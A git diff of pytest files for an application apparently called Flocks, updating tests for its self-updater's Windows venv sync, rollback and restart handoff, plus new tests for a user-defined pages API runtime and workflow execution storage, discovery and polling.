@@ -2225,6 +2225,8 @@ async def test_perform_update_errors_when_uv_not_found(
     archive_path = tmp_path / "flocks.tar.gz"
     archive_path.write_text("archive", encoding="utf-8")
     staged_root = tmp_path / "staged"
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     async def fake_get_updater_config():
         return SimpleNamespace(
@@ -2239,7 +2241,7 @@ async def fake_get_updater_config():
         )
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater.sys, "platform", "linux")
 
@@ -2300,7 +2302,10 @@ async def fake_download(**_kw):
         return archive_path
 
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
+
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2323,6 +2328,65 @@ async def fake_sleep(_s):
     assert call_count == 2
 
 
+@pytest.mark.asyncio
+async def test_perform_update_syncs_windows_venv_in_place(
+    monkeypatch: pytest.MonkeyPatch,
+    tmp_path: Path,
+) -> None:
+    archive_path = tmp_path / "flocks.zip"
+    archive_path.write_text("archive", encoding="utf-8")
+    staged_root = tmp_path / "staged"
+    staged_root.mkdir()
+    install_root = tmp_path / "install-root"
+    old_python = install_root / ".venv" / "Scripts" / "python.exe"
+    old_python.parent.mkdir(parents=True)
+    old_python.write_text("old", encoding="utf-8")
+
+    sync_calls: list[tuple[list[str], Path | None]] = []
+
+    async def fake_get_updater_config():
+        return SimpleNamespace(
+            archive_format="zip",
+            sources=["github"],
+            repo="AgentFlocks/Flocks",
+            token=None,
+            gitee_token=None,
+            backup_retain_count=3,
+            base_url=None,
+            gitee_repo=None,
+        )
+
+    async def fake_download(**_kw):
+        return archive_path
+
+    async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
+        if "sync" in cmd:
+            sync_calls.append((cmd, cwd))
+            assert (install_root / ".venv" / "Scripts" / "python.exe").exists()
+        return 0, "", ""
+
+    monkeypatch.setattr(updater.sys, "platform", "win32")
+    monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
+    monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
+    monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
+    monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
+    monkeypatch.setattr(updater, "_extract_archive", lambda *_a, **_kw: staged_root)
+    monkeypatch.setattr(updater, "_replace_install_dir", lambda *_a, **_kw: None)
+    monkeypatch.setattr(updater, "_run_async", fake_run_async)
+    monkeypatch.setattr(updater, "_find_executable", lambda _name: r"C:\tools\uv.exe")
+    monkeypatch.setattr(updater, "_build_uv_sync_env", lambda: None)
+    monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
+    monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
+
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
+
+    assert progresses[-1].stage == "done"
+    assert sync_calls == [([r"C:\tools\uv.exe", "sync", "--frozen", "--no-python-downloads"], install_root)]
+    assert (install_root / ".venv" / "Scripts" / "python.exe").read_text(encoding="utf-8") == "old"
+    assert not (install_root / ".venv.flocks_backup").exists()
+
+
 @pytest.mark.asyncio
 async def test_perform_update_rolls_back_when_windows_uv_sync_times_out(
     monkeypatch: pytest.MonkeyPatch,
@@ -2336,6 +2400,10 @@ async def test_perform_update_rolls_back_when_windows_uv_sync_times_out(
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     (staged_webui / "dist").mkdir()
     (staged_webui / "dist" / "index.html").write_text("<html></html>", encoding="utf-8")
+    install_root = tmp_path / "install-root"
+    old_python = install_root / ".venv" / "Scripts" / "python.exe"
+    old_python.parent.mkdir(parents=True)
+    old_python.write_text("old", encoding="utf-8")
 
     events: list[str] = []
 
@@ -2356,12 +2424,15 @@ async def fake_download(**_kw):
 
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         if "sync" in cmd:
+            new_python = install_root / ".venv" / "Scripts" / "python.exe"
+            new_python.parent.mkdir(parents=True, exist_ok=True)
+            new_python.write_text("new", encoding="utf-8")
             raise subprocess.TimeoutExpired(cmd=cmd, timeout=timeout or 0)
         return 0, "", ""
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2384,6 +2455,9 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         f"Dependency sync timed out after {expected_timeout}s while running uv sync."
     )
     assert events == ["restore"]
+    assert (install_root / ".venv" / "Scripts" / "python.exe").read_text(encoding="utf-8") == "new"
+    assert not (install_root / ".venv.flocks_failed").exists()
+    assert not (install_root / ".venv.flocks_backup").exists()
 
 
 @pytest.mark.asyncio
@@ -2494,12 +2568,12 @@ async def fake_download(**_kw):
     async def fake_sleep(seconds):
         sleep_calls.append(seconds)
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return None
+    install_root = tmp_path / "install-root"
+    _prepare_real_restart_runtime(install_root)
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
-    monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
+    monkeypatch.setattr(updater, "_get_repo_root", lambda: install_root)
     monkeypatch.setattr(updater, "get_current_version", lambda: "2026.3.31")
     monkeypatch.setattr(updater, "_download_with_fallback", fake_download)
     monkeypatch.setattr(updater, "_backup_current_version", lambda *_a, **_kw: tmp_path / "backup.tar.gz")
@@ -2511,7 +2585,6 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_repair_windows_uv_managed_python_install", lambda text: repaired_messages.append(text) or Path(r"C:\Users\worker\AppData\Roaming\uv\python\cpython-3.12-windows-x86_64-none"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(updater.asyncio, "sleep", fake_sleep)
 
     progresses = [
@@ -2637,9 +2710,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
             events.append("uv-sync")
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return "No module named uvicorn"
-
     def fake_replace_install_dir(*_args, **_kwargs):
         replace_attempts["count"] += 1
         events.append(f"replace-{replace_attempts['count']}")
@@ -2663,18 +2733,19 @@ def fake_replace_install_dir(*_args, **_kwargs):
     monkeypatch.setattr(updater, "_replace_install_dir", fake_replace_install_dir)
     monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
     monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
+    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
+    monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: events.append("popen") or SimpleNamespace(pid=4321))
+    monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    with pytest.raises(SystemExit, match="0"):
+        async for _step in updater.perform_update("2026.4.1"):
+            pass
 
-    assert progresses[-1].stage == "error"
-    assert progresses[-1].message == "No module named uvicorn"
     assert events == [
         "replace-1",
         "handover",
         "replace-2",
-        "uv-sync",
-        "rollback",
+        "popen",
     ]
     assert "restore" not in events
 
@@ -2693,6 +2764,7 @@ async def test_perform_update_reports_frontend_dependency_install_timeout(
     (staged_webui / "package-lock.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     events: list[str] = []
@@ -2730,7 +2802,6 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         "_find_executable",
         lambda name: "/usr/bin/npm" if name in {"npm", "npm.cmd"} else "/usr/bin/uv",
     )
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover") or {})
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
@@ -2738,20 +2809,18 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         or shutil.copytree(staged_webui, install_webui, dirs_exist_ok=True),
     )
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
+    monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Frontend dependency install timed out after 300s while running npm ci."
     assert events == [
         "replace",
-        "/usr/bin/uv sync",
-        "handover",
+        "/usr/bin/uv sync --frozen --no-python-downloads",
         "/usr/bin/npm install",
         "/usr/bin/npm ci",
-        "rollback",
+        "restore",
     ]
 
 
@@ -2768,6 +2837,7 @@ async def test_perform_update_rolls_back_handover_when_current_frontend_build_fa
     (staged_webui / "package.json").write_text("{}", encoding="utf-8")
     install_root = tmp_path / "install-root"
     install_root.mkdir()
+    _prepare_real_restart_runtime(install_root)
     install_webui = install_root / "webui"
 
     events: list[str] = []
@@ -2813,21 +2883,19 @@ async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         "_find_executable",
         lambda name: "/usr/bin/npm" if name in {"npm", "npm.cmd"} else "/usr/bin/uv",
     )
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover") or {})
     monkeypatch.setattr(
         updater,
         "_replace_install_dir",
         lambda *_args, **_kwargs: events.append("replace")
         or shutil.copytree(staged_webui, install_webui, dirs_exist_ok=True),
     )
-    monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: ["/usr/bin/python3", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_rollback_failed_update", lambda *_args: events.append("rollback"))
+    monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
     assert progresses[-1].message == "Frontend build failed: boom"
-    assert events == ["replace", "uv-sync", "handover", "npm-install", "npm-build", "rollback"]
+    assert events == ["replace", "uv-sync", "npm-install", "npm-build", "restore"]
 
 
 @pytest.mark.asyncio
@@ -2837,7 +2905,7 @@ async def test_perform_update_no_orphan_state_when_generator_abandoned_before_ha
 ) -> None:
     """SSE disconnect (GeneratorExit) at any yield point before handover
     must not leave upgrade state or orphan temp-page processes, because
-    the handover now happens after all yields (right before os.execv)."""
+    the handover now happens after all yields (right before restart spawn)."""
     monkeypatch.setenv("FLOCKS_ROOT", str(tmp_path / ".flocks"))
 
     archive_path = tmp_path / "flocks.zip"
@@ -2930,9 +2998,7 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return None
-
+    monkeypatch.setenv("FLOCKS_ROOT", str(tmp_path / ".flocks"))
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
@@ -2950,7 +3016,6 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"])
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
     monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
     monkeypatch.setattr(updater.subprocess, "Popen", lambda argv, cwd=None, close_fds=False: popen_calls.append((list(argv), cwd, close_fds)) or SimpleNamespace(pid=4321))
     monkeypatch.setattr(updater.os, "_exit", lambda code: (_ for _ in ()).throw(SystemExit(code)))
@@ -2960,8 +3025,18 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
         async for _step in updater.perform_update("2026.4.1"):
             pass
 
-    assert popen_calls == [
-        ([r"C:\tool\python.exe", "-m", "flocks.cli.main", "start"], tmp_path / "install-root", True),
+    assert len(popen_calls) == 1
+    handoff_argv, cwd, close_fds = popen_calls[0]
+    assert cwd == tmp_path / "install-root"
+    assert close_fds is True
+    assert handoff_argv[:3] == [r"C:\tool\python.exe", "-m", "flocks.updater.restart_handoff"]
+    assert "--parent-pid" in handoff_argv
+    assert "--backend-port" in handoff_argv
+    assert handoff_argv[handoff_argv.index("--") + 1 :] == [
+        r"C:\tool\python.exe",
+        "-m",
+        "flocks.cli.main",
+        "start",
     ]
     assert events == ["handover"]
     assert "execv" not in events
@@ -3001,8 +3076,8 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | None:
-        return "No module named uvicorn"
+    async def fake_validate_restart_runtime(_install_root: Path) -> str | None:
+        return "Restart runtime is missing: .venv/Scripts/python.exe"
 
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
@@ -3020,14 +3095,13 @@ async def fake_validate_windows_restart_runtime(_install_root: Path) -> str | No
     monkeypatch.setattr(updater, "_replace_install_dir", lambda *_args, **_kwargs: None)
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: events.append("marker"))
     monkeypatch.setattr(updater, "_restore_backup_if_possible", lambda *_args: events.append("restore"))
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate_windows_restart_runtime)
-    monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
+    monkeypatch.setattr(updater, "_validate_restart_runtime", fake_validate_restart_runtime)
     monkeypatch.setattr(updater.subprocess, "Popen", lambda *_args, **_kwargs: events.append("popen"))
 
-    progresses = [step async for step in updater.perform_update("2026.4.1")]
+    progresses = [step async for step in updater.perform_update("2026.4.1", restart=False)]
 
     assert progresses[-1].stage == "error"
-    assert progresses[-1].message == "No module named uvicorn"
+    assert progresses[-1].message == "Restart runtime is missing: .venv/Scripts/python.exe"
     assert events == ["restore"]
 
 
@@ -3127,9 +3201,6 @@ async def fake_download_with_fallback(**_kwargs):
     async def fake_run_async(cmd, cwd=None, timeout=None, env=None):
         return 0, "", ""
 
-    async def fake_validate(_install_root: Path) -> str | None:
-        return None
-
     monkeypatch.setattr(updater.sys, "platform", "win32")
     monkeypatch.setattr(updater, "_get_updater_config", fake_get_updater_config)
     monkeypatch.setattr(updater, "_get_repo_root", lambda: tmp_path / "install-root")
@@ -3147,7 +3218,6 @@ async def fake_validate(_install_root: Path) -> str | None:
     monkeypatch.setattr(updater, "_write_version_marker", lambda _v: None)
     monkeypatch.setattr(updater, "_refresh_global_cli_entry", lambda _root: None)
     monkeypatch.setattr(updater, "_build_restart_argv", lambda install_root=None: [r"C:\tool\python.exe", "-m", "flocks.cli.main"])
-    monkeypatch.setattr(updater, "_validate_windows_restart_runtime", fake_validate)
     monkeypatch.setattr(updater, "_prepare_upgrade_handover", lambda _version: events.append("handover"))
     monkeypatch.setattr(updater, "rollback_upgrade_handover", lambda: events.append("rollback_handover"))
     monkeypatch.setattr(
diff --git a/tests/user_defined_pages/test_api_runtime.py b/tests/user_defined_pages/test_api_runtime.py
index 2b5c9beb6..d08462cc4 100644
--- a/tests/user_defined_pages/test_api_runtime.py
+++ b/tests/user_defined_pages/test_api_runtime.py
@@ -156,6 +156,35 @@ async def _dispatch(page_id: str, api_path: str, request: Request):
         assert resp.status_code == 413
 
 
+@pytest.mark.asyncio
+async def test_api_runtime_treats_client_disconnect_as_closed_request(runtime_store: UserDefinedPagesStore):
+    runtime = UserDefinedPageApiRuntime(runtime_store)
+
+    async def receive():
+        return {"type": "http.disconnect"}
+
+    request = Request(
+        {
+            "type": "http",
+            "asgi": {"version": "3.0"},
+            "http_version": "1.1",
+            "method": "POST",
+            "scheme": "http",
+            "path": "/api/user-defined-pages/runtime-page/api/echo",
+            "raw_path": b"/api/user-defined-pages/runtime-page/api/echo",
+            "query_string": b"",
+            "headers": [],
+            "client": ("127.0.0.1", 12345),
+            "server": ("testserver", 80),
+        },
+        receive,
+    )
+
+    response = await runtime.dispatch("runtime-page", "echo", request, {"role": "admin"})
+
+    assert response.status_code == 499
+
+
 @pytest.mark.asyncio
 async def test_api_runtime_blocks_non_local_imports(runtime_store: UserDefinedPagesStore, runtime_app: FastAPI):
     runtime_store.save_source_file(
diff --git a/tests/workflow/test_execution_store_compact.py b/tests/workflow/test_execution_store_compact.py
index 13c8b13f8..1707280de 100644
--- a/tests/workflow/test_execution_store_compact.py
+++ b/tests/workflow/test_execution_store_compact.py
@@ -17,6 +17,7 @@
 
 from __future__ import annotations
 
+import json
 from typing import Any, Dict, List
 from unittest.mock import AsyncMock, patch
 
@@ -26,8 +27,11 @@
     DEFAULT_LARGE_LIST_KEYS,
     _trim_execution_history,
     compact_history_for_storage,
+    compact_execution_summary,
     compact_outputs_for_storage,
     compact_step_for_storage,
+    record_execution_result,
+    workflow_execution_step_key,
 )
 from flocks.storage.storage import Storage
 
@@ -232,6 +236,79 @@ def test_compact_history_skips_step_with_non_dict_outputs() -> None:
     assert compacted[0]["outputs"] == "string-output"
 
 
+def test_compact_step_accepts_pydantic_like_model_dump() -> None:
+    class StepLike:
+        def model_dump(self, mode: str = "python") -> Dict[str, Any]:
+            assert mode == "json"
+            return {
+                "node_id": "step-1",
+                "outputs": {"raw_alerts": _make_alerts(150)},
+            }
+
+    compacted = compact_step_for_storage(StepLike())
+
+    assert compacted["node_id"] == "step-1"
+    assert compacted["outputs"] == {"_raw_alerts_count": 150}
+
+
+def test_compact_execution_summary_drops_execution_log() -> None:
+    exec_data = {
+        "id": "exec-1",
+        "workflowId": "wf",
+        "executionLog": [{"node_id": "a"}],
+        "stepCount": 1,
+    }
+
+    summary = compact_execution_summary(exec_data)
+
+    assert summary["executionLog"] == []
+    assert summary["stepCount"] == 1
+    assert exec_data["executionLog"] == [{"node_id": "a"}]
+
+
+def test_workflow_execution_step_key_is_append_only_namespaced() -> None:
+    assert (
+        workflow_execution_step_key("exec-1", 12)
+        == "workflow_execution_step/exec-1/00000012"
+    )
+
+
+@pytest.mark.asyncio
+async def test_record_execution_result_backfills_execution_log_steps() -> None:
+    storage_write = AsyncMock(return_value=None)
+    update_stats = AsyncMock(return_value=None)
+    exec_data = {
+        "id": "exec-1",
+        "workflowId": "wf",
+        "status": "success",
+        "duration": 1.0,
+        "executionLog": [
+            {"node_id": "step-1", "outputs": {"raw_alerts": _make_alerts(150)}},
+            {"node_id": "step-2", "inputs": {"filtered_alerts": _make_alerts(150)}},
+        ],
+    }
+
+    def raise_create_task(coro, *args, **kwargs):  # noqa: ANN001, ARG001
+        coro.close()
+        raise RuntimeError
+
+    with patch.object(Storage, "write", storage_write), \
+         patch("flocks.workflow.execution_store._update_workflow_stats", update_stats), \
+         patch("flocks.session.recorder.Recorder.record_workflow_execution", AsyncMock(return_value=None)), \
+         patch("flocks.workflow.execution_store.asyncio.create_task", side_effect=raise_create_task), \
+         patch("flocks.workflow.execution_store._trim_execution_history", AsyncMock(return_value=None)):
+        await record_execution_result("wf", "exec-1", exec_data)
+
+    write_calls = storage_write.await_args_list
+    assert write_calls[0].args[0] == "workflow_execution_step/exec-1/00000001"
+    assert write_calls[0].args[1]["outputs"] == {"_raw_alerts_count": 150}
+    assert write_calls[1].args[0] == "workflow_execution_step/exec-1/00000002"
+    assert write_calls[1].args[1]["inputs"] == {"_filtered_alerts_count": 150}
+    assert write_calls[2].args[0] == "workflow_execution/exec-1"
+    assert write_calls[2].args[1]["executionLog"] == []
+    assert write_calls[2].args[1]["stepCount"] == 2
+
+
 def test_compact_history_compacts_each_step_inputs() -> None:
     big = _make_alerts(5_000)
     history = [
@@ -345,7 +422,14 @@ async def test_trim_execution_history_keeps_only_30_and_deletes_matching_jsonl(
     other_record.write_text('{"type":"workflow.summary"}\n', encoding="utf-8")
 
     remove_mock = AsyncMock(return_value=None)
-    with patch.object(Storage, "list_entries", AsyncMock(return_value=entries)), \
+    raw_entries = [(key, json.dumps(value)) for key, value in entries]
+
+    async def list_raw_side_effect(prefix: str):
+        if prefix == "workflow_execution/":
+            return raw_entries
+        return []
+
+    with patch.object(Storage, "list_raw", AsyncMock(side_effect=list_raw_side_effect)), \
          patch.object(Storage, "remove", remove_mock), \
          patch("flocks.session.recorder._record_dir", return_value=tmp_path):
         await _trim_execution_history(workflow_id)
diff --git a/tests/workflow/test_fs_store.py b/tests/workflow/test_fs_store.py
index 80994b141..711f072ee 100644
--- a/tests/workflow/test_fs_store.py
+++ b/tests/workflow/test_fs_store.py
@@ -89,3 +89,105 @@ def test_read_workflow_dir_uses_latest_file_mtime_when_meta_is_stale(
     assert data is not None
     assert data["updatedAt"] == 9000
     assert data["markdownContent"] == "# demo\n"
+    assert data["editMarkdownContent"] == "# demo\n"
+
+
+def test_read_workflow_dir_uses_legacy_edit_markdown_only_as_fallback(
+    tmp_path: Path,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "legacy-edit-md-demo"
+    _write_workflow(workspace, workflow_id, "legacy-demo")
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+
+    (workflow_dir / "workflow.edit.md").write_text("# legacy\n", encoding="utf-8")
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "project")
+
+    assert data is not None
+    assert data["markdownContent"] == "# legacy\n"
+    assert data["editMarkdownContent"] == "# legacy\n"
+
+
+def test_read_workflow_dir_supports_markdown_only_draft(
+    tmp_path: Path,
+):
+    workflow_id = "domain_intel_query"
+    workflow_dir = tmp_path / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.md").write_text(
+        "# Domain Intel Query\n\n## Purpose\n\nDraft spec only.\n",
+        encoding="utf-8",
+    )
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "global")
+
+    assert data is not None
+    assert data["id"] == workflow_id
+    assert data["name"] == "Domain Intel Query"
+    assert data["status"] == "draft"
+    assert data["source"] == "global"
+    assert data["workflowJson"] == {"start": "", "nodes": [], "edges": []}
+    assert data["markdownContent"].startswith("# Domain Intel Query")
+    assert data["editMarkdownContent"] == data["markdownContent"]
+
+
+def test_read_workflow_from_fs_discovers_markdown_only_draft(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "markdown-only-demo"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    (workflow_dir / "workflow.md").write_text("# Markdown Only Demo\n", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)
+
+    data = fs_store.read_workflow_from_fs(workflow_id)
+
+    assert data is not None
+    assert data["id"] == workflow_id
+    assert data["name"] == "Markdown Only Demo"
+    assert data["workflowJson"]["nodes"] == []
+
+
+def test_resolve_workflow_id_from_markdown_path(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "markdown-path-demo"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True, exist_ok=True)
+    md_file = workflow_dir / "workflow.md"
+    md_file.write_text("# Markdown Path Demo\n", encoding="utf-8")
+
+    monkeypatch.chdir(workspace)
+
+    assert fs_store.resolve_workflow_id_from_source(str(md_file)) == workflow_id
+
+
+def test_read_workflow_dir_exposes_localized_names_from_metadata(
+    tmp_path: Path,
+):
+    workspace = tmp_path / "workspace"
+    workflow_id = "localized-name-demo"
+    _write_workflow(workspace, workflow_id, "Localized Name Demo")
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_json = json.loads((workflow_dir / "workflow.json").read_text(encoding="utf-8"))
+    workflow_json["metadata"] = {
+        "nameI18n": {
+            "zh-CN": "本地化名称演示",
+            "en-US": "Localized Name Demo",
+        }
+    }
+    (workflow_dir / "workflow.json").write_text(json.dumps(workflow_json), encoding="utf-8")
+
+    data = fs_store.read_workflow_dir(workflow_dir, workflow_id, "project")
+
+    assert data is not None
+    assert data["nameI18n"] == {
+        "zh-CN": "本地化名称演示",
+        "en-US": "Localized Name Demo",
+    }
diff --git a/tests/workflow/test_logging_config.py b/tests/workflow/test_logging_config.py
index ed9a5878c..8cb6ed814 100644
--- a/tests/workflow/test_logging_config.py
+++ b/tests/workflow/test_logging_config.py
@@ -46,5 +46,7 @@ def test_run_workflow_default_logging_suppresses_routine_execution_noise() -> No
         logs = stream.getvalue()
         assert "开始执行 workflow" not in logs
         assert "workflow 信息" not in logs
+        assert "outputs=" not in logs
+        assert "outputs_keys=['ok']" in logs
     finally:
         logger.handlers.clear()
diff --git a/tests/workflow/test_poller_manager.py b/tests/workflow/test_poller_manager.py
index 82fcb86ea..63534e535 100644
--- a/tests/workflow/test_poller_manager.py
+++ b/tests/workflow/test_poller_manager.py
@@ -2,11 +2,13 @@
 
 import asyncio
 import threading
+from types import SimpleNamespace
 from typing import Any
 
 import pytest
 
 from flocks.workflow import poller_manager
+from flocks.workflow import execution_store
 from flocks.workflow.runner import RunWorkflowResult
 
 
@@ -51,7 +53,15 @@ async def _fake_read(_key: str) -> dict[str, Any]:
             "inputs": {"dedup_source_workflow_name": "stream_alert_denoise_gt_fast"},
         }
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         captured_inputs.update(inputs)
         assert workflow == {"start": "n1", "nodes": [], "edges": []}
         assert timeout_s == 9
@@ -115,6 +125,7 @@ async def test_run_once_records_execution_and_normalizes_business_failure(
     manager = poller_manager.WorkflowPollerManager()
     created_records: list[dict[str, Any]] = []
     recorded_results: list[dict[str, Any]] = []
+    recorded_steps: list[tuple[str, int, dict[str, Any]]] = []
 
     async def _fake_read(_key: str) -> dict[str, Any]:
         return {
@@ -150,12 +161,38 @@ async def _fake_record_execution_result(
         _ = workflow_id, exec_id
         recorded_results.append(dict(exec_data))
 
-    def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int, trace: bool, cancel):  # noqa: ANN001
+    async def _fake_record_execution_step(
+        exec_id: str,
+        step_index: int,
+        step: dict[str, Any],
+    ) -> dict[str, Any]:
+        recorded_steps.append((exec_id, step_index, step))
+        return step
+
+    def _fake_run_workflow(  # noqa: ANN001
+        *,
+        workflow: Any,
+        inputs: dict[str, Any],
+        timeout_s: int,
+        trace: bool,
+        cancel,
+        on_step_complete,
+    ):
         assert workflow == {"start": "n1", "nodes": [], "edges": []}
         assert timeout_s == 9
         assert trace is False
         assert cancel() is False
         assert inputs["dedup_source_workflow_name"] == "stream_alert_denoise_gt_fast"
+        on_step_complete(
+            SimpleNamespace(
+                model_dump=lambda mode="json": {
+                    "node_id": "load",
+                    "node_type": "python",
+                    "inputs": {"iteration": 1, "total_iterations": 2},
+                    "outputs": {"load_stats": {"record_count": 9}},
+                }
+            )
+        )
         return RunWorkflowResult(
             status="SUCCEEDED",
             run_id="run-1",
@@ -176,6 +213,7 @@ def _fake_run_workflow(*, workflow: Any, inputs: dict[str, Any], timeout_s: int,
     )
     monkeypatch.setattr(poller_manager, "create_execution_record", _fake_create_execution_record)
     monkeypatch.setattr(poller_manager, "record_execution_result", _fake_record_execution_result)
+    monkeypatch.setattr(execution_store, "record_execution_step", _fake_record_execution_step)
     monkeypatch.setattr(poller_manager, "run_workflow", _fake_run_workflow)
 
     status = await manager.run_once("wf-business-failure")
